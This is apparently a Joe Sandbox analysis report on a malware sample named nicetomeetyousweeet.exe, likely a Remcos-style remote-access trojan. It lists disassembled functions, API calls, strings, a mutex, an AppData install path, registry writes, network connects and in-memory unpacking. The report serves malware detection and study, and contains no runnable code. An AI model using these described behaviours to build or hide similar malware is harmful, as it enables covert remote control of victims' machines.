                                                                                 • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Name$ComputerUser
                                                                                • String ID:
                                                                                • API String ID: 4229901323-0
                                                                                • Opcode ID: ed216285d6bfdcac9a638f4fe4a7e0c681483f792ab1cbe08182ae81c23a0ae2
                                                                                • Instruction ID: 0a408ea7b536296bc4698588bf682dce528bd2697060893402f21fe22c13e40a
                                                                                • Opcode Fuzzy Hash: ed216285d6bfdcac9a638f4fe4a7e0c681483f792ab1cbe08182ae81c23a0ae2
                                                                                • Instruction Fuzzy Hash: 8801FF7290011CAADB14EB90DC45ADDBBBCEF44715F10017AB501B21D5EFB4AB898A98

                                                                                Control-flow Graph

                                                                                 • Graph of function 413fd4 (basic blocks 413fd4-414b96); legend: Executed / Not Executed; API calls marked in the graph: Sleep, WSAGetLastError, GetTickCount, CreateThread
                                                                                APIs
                                                                                • Sleep.KERNEL32(00000000,00000029,004742F8,?,00000000), ref: 00414028
                                                                                • WSAGetLastError.WS2_32 ref: 00414249
                                                                                • Sleep.KERNELBASE(00000000,00000002), ref: 00414B88
                                                                                  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Sleep$ErrorLastLocalTime
                                                                                • String ID: | $%I64u$5.3.0 Pro$@CG$C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$Exe$Rmc-GJDISH$TLS Off$TLS On $XCG$XCG$XCG$`=G$dCG$hlight$name$>G$>G$BG
                                                                                • API String ID: 524882891-2814136433
                                                                                • Opcode ID: 8058ea3990e45dd0313c4cff3eee3b297f86610f98fd31dfb78e3f8a2bfd2f01
                                                                                • Instruction ID: a0bb0b13232d9f5991351636829aab2dda2428bc81dc0b9639db3628de0ead2f
                                                                                • Opcode Fuzzy Hash: 8058ea3990e45dd0313c4cff3eee3b297f86610f98fd31dfb78e3f8a2bfd2f01
                                                                                • Instruction Fuzzy Hash: 58524E31A001145ADB18F771DDA6AEE73A59F90708F1041BFB80A771E2EF385E85CA9D

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • connect.WS2_32(?,006BB748,00000010), ref: 004042A5
                                                                                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043CB
                                                                                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043D5
                                                                                • WSAGetLastError.WS2_32(?,?,?,0040192B), ref: 004043E7
                                                                                  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                                                • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                                                • API String ID: 994465650-2151626615
                                                                                • Opcode ID: c561125659aae0c09ea28a7821dc0bf5602007b287621a04134ad895a3bd37cf
                                                                                • Instruction ID: b196b808fbc66b1ac8da6b4b51d7f626a0d3d22bc4cde50e21f83cd2c7739b74
                                                                                • Opcode Fuzzy Hash: c561125659aae0c09ea28a7821dc0bf5602007b287621a04134ad895a3bd37cf
                                                                                • Instruction Fuzzy Hash: ED4128B1B00202A7CB04B77A8C5B66D7A55AB81368B40007FF901676D3EE7DAD6087DF

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 004047FD
                                                                                • SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404808
                                                                                • CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404811
                                                                                • closesocket.WS2_32(000000FF), ref: 0040481F
                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404856
                                                                                • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404867
                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040486E
                                                                                • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404880
                                                                                • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404885
                                                                                • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040488A
                                                                                • SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404895
                                                                                • CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 0040489A
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                                                • String ID:
                                                                                • API String ID: 3658366068-0
                                                                                • Opcode ID: 5ad18bbf4ae7feaed2857fa056367bca8483678701d03ea676763946d5c1548a
                                                                                • Instruction ID: 5504d0c870acfe65fd0076db90b097e51f0e6d2514c589c74abed5ba37c9c78a
                                                                                • Opcode Fuzzy Hash: 5ad18bbf4ae7feaed2857fa056367bca8483678701d03ea676763946d5c1548a
                                                                                • Instruction Fuzzy Hash: 3C212C71104B149FCB216B26EC45A27BBE1EF40325F104A7EF2E612AF1CB76E851DB48

                                                                                Control-flow Graph

                                                                                 • Graph of function 40c89e (basic blocks 40c89e-40ca85); legend: Executed / Not Executed; API call marked in the graph: GetLongPathNameW
                                                                                APIs
                                                                                • GetLongPathNameW.KERNELBASE(00000000,?,00000208), ref: 0040CA04
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LongNamePath
                                                                                • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                                                • API String ID: 82841172-425784914
                                                                                • Opcode ID: c40a772e0e925007f02d667aca04cc94c71f8078b9392a0811ef0e32d8b09b5b
                                                                                • Instruction ID: 51cedb133b73bca78a9fc1065318242b3d6e678e936cb09da4a185c9a299c852
                                                                                • Opcode Fuzzy Hash: c40a772e0e925007f02d667aca04cc94c71f8078b9392a0811ef0e32d8b09b5b
                                                                                • Instruction Fuzzy Hash: 39413A721442009BC214FB21DD96DAFB7A4AE90759F10063FB546720E2EE7CAA49C69F

                                                                                Control-flow Graph

                                                                                 • Graph of function 78003c (basic blocks 78003c-78091d); legend: Executed / Not Executed; API calls marked in the graph: VirtualAlloc, VirtualProtect, VirtualFree, LoadLibraryA
                                                                                APIs
                                                                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0078024D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID: cess$kernel32.dll
                                                                                • API String ID: 4275171209-1230238691
                                                                                • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                • Instruction ID: 11e41495bae7d7e4d724454cbfe7a509fbcdab37b2827ee2bc84ff87f4a961b5
                                                                                • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                • Instruction Fuzzy Hash: 19527974A01229DFDBA4CF58C984BA8BBB1BF09304F1480D9E50DAB351DB34AE99DF54

                                                                                Control-flow Graph

                                                                                APIs
                                                                                  • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                                                                  • Part of subcall function 0041B15B: IsWow64Process.KERNEL32(00000000,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B173
                                                                                  • Part of subcall function 00412513: RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                                                  • Part of subcall function 00412513: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                                                  • Part of subcall function 00412513: RegCloseKey.KERNELBASE(?), ref: 0041255F
                                                                                • StrToIntA.SHLWAPI(00000000,0046BC48,?,00000000,00000000,00474358,00000003,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0041A4D9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                 • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Process$CloseCurrentOpenQueryValueWow64
                                                                                • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                • API String ID: 782494840-2070987746
                                                                                • Opcode ID: 0f840801c1757ac233eadf91f42c37311e9c1d9dac439ea88a97dfd6c29ab248
                                                                                • Instruction ID: 19977b185b3bcff34fa520d2ecc4782d624f476aadfe6515b429a208ce335d2f
                                                                                • Opcode Fuzzy Hash: 0f840801c1757ac233eadf91f42c37311e9c1d9dac439ea88a97dfd6c29ab248
                                                                                • Instruction Fuzzy Hash: EF11E9A060020166C704B365DCABDBF765ADB90304F50443FB906E31D2EB6C9E9683EE

                                                                                Control-flow Graph

                                                                                 • Graph of function 4126d2 (basic blocks 4126d2-412730); legend: Executed / Not Executed; API calls marked in the graph: RegCreateKeyA, RegSetValueExA, RegCloseKey
                                                                                APIs
                                                                                • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004126E1
                                                                                • RegSetValueExA.KERNELBASE(?,HgF,00000000,?,00000000,00000000,004742F8,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412709
                                                                                • RegCloseKey.KERNELBASE(?,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412714
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseCreateValue
                                                                                • String ID: HgF$pth_unenc
                                                                                • API String ID: 1818849710-3662775637
                                                                                • Opcode ID: 7bba4fca9e91e474f2300f61649ee5aed28a721c6f9292861d9dcd206a4cf4dc
                                                                                • Instruction ID: d7c223529d0a909ac1d5b5cf1be9cbd74eb10d05c00374dbcf2eb8abb0eb8976
                                                                                • Opcode Fuzzy Hash: 7bba4fca9e91e474f2300f61649ee5aed28a721c6f9292861d9dcd206a4cf4dc
                                                                                • Instruction Fuzzy Hash: 98F09032040104FBCB019FA0ED55EEF37ACEF04751F108139FD06A61A1EA75DE04EA94

                                                                                Control-flow Graph

                                                                                control_flow_graph 1280 4127d5-4127eb RegCreateKeyA 1281 412818-41281b 1280->1281 1282 4127ed-412812 RegSetValueExA RegCloseKey 1280->1282 1282->1281 1283 412814-412817 1282->1283
                                                                                APIs
                                                                                • RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                • RegSetValueExA.KERNELBASE(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseCreateValue
                                                                                • String ID: TUF
                                                                                • API String ID: 1818849710-3431404234
                                                                                • Opcode ID: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                                                                                • Instruction ID: 4d8f19d4f5fba69279ea975c705bdc3302fb28fe13ea63ccb444db4f968143a5
                                                                                • Opcode Fuzzy Hash: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                                                                                • Instruction Fuzzy Hash: 8DE03071540204BFEF115B909C05FDB3BA8EB05B95F004161FA05F6191D271CE14D7A4

                                                                                Control-flow Graph

                                                                                control_flow_graph 1284 40bed7-40bf03 call 401e8f CreateMutexA GetLastError
                                                                                APIs
                                                                                • CreateMutexA.KERNELBASE(00000000,00000001,00000000,0040D9AA,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0040BEE6
                                                                                • GetLastError.KERNEL32 ref: 0040BEF1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateErrorLastMutex
                                                                                • String ID: Rmc-GJDISH
                                                                                • API String ID: 1925916568-2180735960
                                                                                • Opcode ID: defc0333e3605ddb085507e8cb5f1de2847b42d11ba618549d06c615cf8541f0
                                                                                • Instruction ID: f970ec9d0541ab61c93bafde2a4f59c5c821b48a7874ab2150ad5935bc14b509
                                                                                • Opcode Fuzzy Hash: defc0333e3605ddb085507e8cb5f1de2847b42d11ba618549d06c615cf8541f0
                                                                                • Instruction Fuzzy Hash: 75D012707083009BD7181774BC8A77D3555E784703F00417AB90FD55E1CB6888409919

                                                                                Control-flow Graph

                                                                                control_flow_graph 1287 412513-41253f RegOpenKeyExA 1288 412541-412567 RegQueryValueExA RegCloseKey 1287->1288 1289 412572 1287->1289 1288->1289 1291 412569-412570 1288->1291 1290 412577-412583 call 401f66 1289->1290 1291->1290
                                                                                APIs
                                                                                • RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                                                • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                                                • RegCloseKey.KERNELBASE(?), ref: 0041255F
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseOpenQueryValue
                                                                                • String ID:
                                                                                • API String ID: 3677997916-0
                                                                                • Opcode ID: eefaa00199052949f50bc372dae43a8d785cde676b73bf91841c85306d5a74f2
                                                                                • Instruction ID: 155fce86b91483c744b9f02885d56de91ccd1cdd8f33956e2d71fd22bd1c87ae
                                                                                • Opcode Fuzzy Hash: eefaa00199052949f50bc372dae43a8d785cde676b73bf91841c85306d5a74f2
                                                                                • Instruction Fuzzy Hash: F0F08176900118BBCB209BA1ED48DEF7FBDEB44751F004066BA06E2150D6749E55DBA8

                                                                                Control-flow Graph

                                                                                control_flow_graph 1294 4124b7-4124df RegOpenKeyExA 1295 4124e1-412509 RegQueryValueExA RegCloseKey 1294->1295 1296 41250f-412512 1294->1296 1295->1296 1297 41250b-41250e 1295->1297
                                                                                APIs
                                                                                • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 004124D7
                                                                                • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                                                                                • RegCloseKey.KERNELBASE(?), ref: 00412500
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseOpenQueryValue
                                                                                • String ID:
                                                                                • API String ID: 3677997916-0
                                                                                • Opcode ID: 9045fb9a7a6208df116313aaf282ceb7280aaf27367a6f7e2add9e4d3bf57581
                                                                                • Instruction ID: 3c8b5742b91bab9b7a0bfd6479237677f271592d1db5ef4b45a1d16c6b8d7bbd
                                                                                • Opcode Fuzzy Hash: 9045fb9a7a6208df116313aaf282ceb7280aaf27367a6f7e2add9e4d3bf57581
                                                                                • Instruction Fuzzy Hash: C0F03A76900208BFDF119FA0AC45FDF7BB9EB04B55F1040A1FA05F6291D670DA54EB98
                                                                                APIs
                                                                                • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?,00000000,?,?,0040B996,004660E0), ref: 00412485
                                                                                • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,00000000,?,?,0040B996,004660E0), ref: 00412499
                                                                                • RegCloseKey.KERNELBASE(?,?,?,0040B996,004660E0), ref: 004124A4
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseOpenQueryValue
                                                                                • String ID:
                                                                                • API String ID: 3677997916-0
                                                                                • Opcode ID: e297991b72ec1606279c96c89a25a7ac8737aea41b7b6b8683e2e1c686c69e22
                                                                                • Instruction ID: 2a31b93e49ffe9e6f23ef690bd11c8afd6de107f9352384350bf23698ee7218d
                                                                                • Opcode Fuzzy Hash: e297991b72ec1606279c96c89a25a7ac8737aea41b7b6b8683e2e1c686c69e22
                                                                                • Instruction Fuzzy Hash: 46E06531405234BBDF314BA2AD0DDDB7FACEF16BA17004061BC09A2251D2658E50E6E8
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _wcslen
                                                                                • String ID: xAG
                                                                                • API String ID: 176396367-2759412365
                                                                                • Opcode ID: 573513da3506cc6e2164d5a8d3b0478513ec7ea66a17680ca2f11e08e2d1aca0
                                                                                • Instruction ID: 4b5f0267b16b6d1f94f05398eea60063c36f9fdec9e789d07f1c8464d26cb595
                                                                                • Opcode Fuzzy Hash: 573513da3506cc6e2164d5a8d3b0478513ec7ea66a17680ca2f11e08e2d1aca0
                                                                                • Instruction Fuzzy Hash: 751193325002049FCB15FF66D8968EF7BA4EF64314B10453FF842622E2EF38A955CB98
                                                                                APIs
                                                                                • _free.LIBCMT ref: 0044B9DF
                                                                                  • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                • HeapReAlloc.KERNEL32(00000000,00475D30,?,00000004,00000000,?,0044E90A,00475D30,00000004,?,00475D30,?,?,00443125,00475D30,?), ref: 0044BA1B
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Heap$AllocAllocate_free
                                                                                • String ID:
                                                                                • API String ID: 2447670028-0
                                                                                • Opcode ID: d76ce5d9e4c682b15a99abc110236e8d1a2fbccdd24d1d48a07619e1950cdef4
                                                                                • Instruction ID: 12956794463f81a5c067cbc08b9f94d22fea268b9007f3edb04f63306941b305
                                                                                • Opcode Fuzzy Hash: d76ce5d9e4c682b15a99abc110236e8d1a2fbccdd24d1d48a07619e1950cdef4
                                                                                • Instruction Fuzzy Hash: D6F0F67210051167FF212A27AC01B6B2B2CDFC27B1F15012BFA18AA292DF6CCC0191EE
                                                                                APIs
                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 005B07CE
                                                                                • Module32First.KERNEL32(00000000,00000224), ref: 005B07EE
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146258809.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005B0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_5b0000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                • String ID:
                                                                                • API String ID: 3833638111-0
                                                                                • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                • Instruction ID: 5f20ef3ee0f14b5cbd34ce0806dc149e082bf947dbaad13e1c58f5f577320b0b
                                                                                • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                • Instruction Fuzzy Hash: 78F062311017116FD7203AB5988DAAFBBECFF49765F101568E642910C0DE70F8454A61
                                                                                APIs
                                                                                • socket.WS2_32(00000002,00000001,00000006), ref: 00404212
                                                                                  • Part of subcall function 00404262: WSAStartup.WS2_32(00000202,00000000), ref: 00404277
                                                                                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404252
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateEventStartupsocket
                                                                                • String ID:
                                                                                • API String ID: 1953588214-0
                                                                                • Opcode ID: 854d00471859da485f7a9b00171063840124e4cdae7de36f8ad07afc2a8c10ec
                                                                                • Instruction ID: 6d5c4ce7eefecebe47fda3b025552a79fd8a61a73b62065855ea20d17e135052
                                                                                • Opcode Fuzzy Hash: 854d00471859da485f7a9b00171063840124e4cdae7de36f8ad07afc2a8c10ec
                                                                                • Instruction Fuzzy Hash: A20171B05087809ED7358F38B8456977FE0AB15314F044DAEF1D697BA1C3B5A481CB18
                                                                                APIs
                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00433DE7
                                                                                  • Part of subcall function 00437BD7: RaiseException.KERNEL32(?,?,00434411,?,?,?,?,?,?,?,?,00434411,?,0046D644,00404AD0), ref: 00437C37
                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00433E04
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.4145931903.0000000000473000.00000040.00000001.01000000.0000000C.sdmp
                                                                                • Associated: 00000006.00000002.4145931903.0000000000476000.00000040.00000001.01000000.0000000C.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Exception@8Throw$ExceptionRaise
                                                                                • String ID:
                                                                                • API String ID: 3476068407-0
                                                                                • Opcode ID: 268c4e751f198f59258c5df1bcef4ea0fc34f27caa05a39f735a57a931bd9370
                                                                                • Instruction ID: 1b32a2814776e74a5aaecdac66354fa275a8f3c838098619b8de34dc4906cb01
                                                                                • Opcode Fuzzy Hash: 268c4e751f198f59258c5df1bcef4ea0fc34f27caa05a39f735a57a931bd9370
                                                                                • Instruction Fuzzy Hash: 33F02B30C0020D77CB14BEA5E80699D772C4D08319F20923BB920915E1EF7CEB05858D
                                                                                APIs
                                                                                • SetErrorMode.KERNELBASE(00000400,?,?,00780223,?,?), ref: 00780E19
                                                                                • SetErrorMode.KERNELBASE(00000000,?,?,00780223,?,?), ref: 00780E1E
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_780000_nicetomeetyousweeet.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorMode
                                                                                • String ID:
                                                                                • API String ID: 2340568224-0
